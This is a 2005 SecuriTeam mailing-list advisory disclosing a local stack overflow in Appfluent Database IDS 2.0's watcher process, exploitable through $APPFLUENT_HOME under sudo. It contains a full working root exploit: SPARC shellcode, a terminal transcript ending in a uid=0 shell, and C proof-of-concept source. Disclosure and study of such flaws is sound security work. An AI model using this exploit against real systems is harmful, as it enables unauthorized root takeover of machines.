[UNIX] Appfluent Database IDS Local Buffer Overflow
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 8 Dec 2005 15:50:19 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Appfluent Database IDS Local Buffer Overflow
------------------------------------------------------------------------
SUMMARY
" <> Appfluent Technology provides a suite of data usage and query
performance software designed to help IT organizations reduce the number
of databases they maintain, improve performance of Business Intelligence
(BI) and enterprise applications, and quickly deploy new applications."
Improper length validation allows local attackers to craft special content
to Appfluent's System Variable, allowing them to cause the program to
execute arbitrary code with root privileges.
DETAILS
Vulnerable Systems:
* Appfluent Database IDS version 2.0
Immune Systems:
* Appfluent Database IDS version 2.1.0.103
Appfluent provide a Database IDS system that monitors all SQL traffic in
real time, logging every user defined transaction to a database, providing
an audit trail of all transactions that take place. There are several
processes that cumulate together to provide the IDS solution, including
watcher, analyzer, alerter and reporter.
There is a stack based buffer overflow in all binaries that allow for
malicious attacker to gain unauthorized code execution on the system where
the application is installed. Due to incorrect use of strcpy(), and a lack
of correct bounds checking, a user can manipulate the $APPFLUENT_HOME
environment variable to overflow the stack buffer.
The problem is specific to the watcher process, as it needs to be run as
root due to the fact that it sniffs all traffic going to an interface. A
script installed in $APPFLUENT_HOME/server_oracle/bin is supplied so that
administrators can run the process via sudo.
When run with sudo, we are provided a vector for root compromise as a
default sudo install on many operating systems that honor the setting of
environment variables. As such, when an attacker crafts $APPFLUENT_HOME in
a malicious manner and runs the watcher process, root access to the system
is gained.
There are a few requirements that need to be met for the attack to be
successful, and they include:
1) User is in the sudoers file and is defined as able to run the watcher
process
2) Sudo honors environment variables, meaning env_reset or the likes is
not set
Please note that users must set, or have $APPFLUENT_HOME set for the
product to work, and if the above two requirements are met, an attacker is
guaranteed to gain unauthorized root access to the system.
Proof of Concept:
/*###
## Proof run with a default sudo install from sunfreeware.
###
[c0ntex@ ~/vuln]$ export SHELLCODE=`printf
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22\x20\x01\x92\x10\x3f
\xff\x82\x10\x20\xca\x91\xd0\x20\x08\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01
\x90\x22\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08\x94\x1a\x80\x0a\x21
\x0b\xd5\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23
\xbf\xf8\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xfd\xd0\x23\xbf\xec\x92\x23\xa0
\x14\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08"`
[c0ntex@ ~/vuln]$ export APPFLUENT_HOME=`perl -e 'print "A" x
576'``printf "\xff\xbe
\xfa\xd0\xff\xbe\xfa\xd0"`
[c0ntex@ ~/vuln]$ sudo /tmp/watch/watcher -sc
Password:
Version: 2.0.0.103
do_process: Exception:
file: file_stream.cpp
line: 338
message: FileStream: fopen :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
oracle
/config/config : 78 : File name too long
code: 78
stack:
#0 void IC::ConfigFile::load(IC::StrP) at config_file.cpp:35
#1 virtual void IC::ServerConfig::load() at
/home/ask/lab/v2_0/app/product/server/l
ib/libserverconfig/server_config.cpp:70
#2 virtual void IC::Watch::run(bool, bool) at
/home/ask/lab/v2_0/app/product/server
/lib/libwatch/watch.cpp:41
#3 int do_process(bool) at
/home/ask/lab/v2_0/app/product/server/bin/watch/do_proce
ss.cpp:21
#
#
# uname -a
SunOS 5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2
#
# id -a
uid=0(root) gid=1(other)
groups=1(other),0(root),2(bin),3(sys),4(adm),5(uucp),6(mail
),7(tty),8(lp),9(nuucp),12(daemon)
#
Greetings to everyone I know ;-)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define DAHBUF 591
#define NOP 0x90
#define SUDO "/usr/local/bin/sudo"
#define VULN "watcher"
#define WOPT "-sc"
char shellcode[] =
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
char retloc[] = "\xff\xbe\xfd\xe9";
char retlok[] = "\xff\xbe\xfd\xed";
int main()
{
char env[DAHBUF+9];
puts("\nLocal root proof of concept for Appfluent IDS Watcher
environment overflow");
puts("found and developed by c0ntex || c0ntexb@xxxxxxxxx ||
www.open-security.org\n");
memset(env, NOP, DAHBUF);
memcpy(env + 100, shellcode, strlen(shellcode));
memcpy(env + DAHBUF, retloc, strlen(retloc));
memcpy(env + DAHBUF + 4, retlok, strlen(retlok));
env[DAHBUF+9] = '\0';
strncpy(&env[0], "APPFLUENT_HOME=", 15);
if(!env) {
puts("barfed!");
return(EXIT_FAILURE);
}
putenv(env);
if(execl(SUDO, SUDO, VULN, WOPT, NULL) < 0) {
perror("execle");
return(EXIT_FAILURE);
}
return(EXIT_SUCCESS);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:c0ntexb@xxxxxxxxx> c0ntex.
The original article can be found at:
<http://www.open-security.org/advisories/14>
http://www.open-security.org/advisories/14
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] Cisco IOS HTTP Server Command Injection
- Next by Date: [EXPL] Remote Linux Access (Exploit)
- Previous by thread: [NEWS] Cisco IOS HTTP Server Command Injection
- Next by thread: [EXPL] Remote Linux Access (Exploit)
- Index(es):
Relevant Pages
|
|
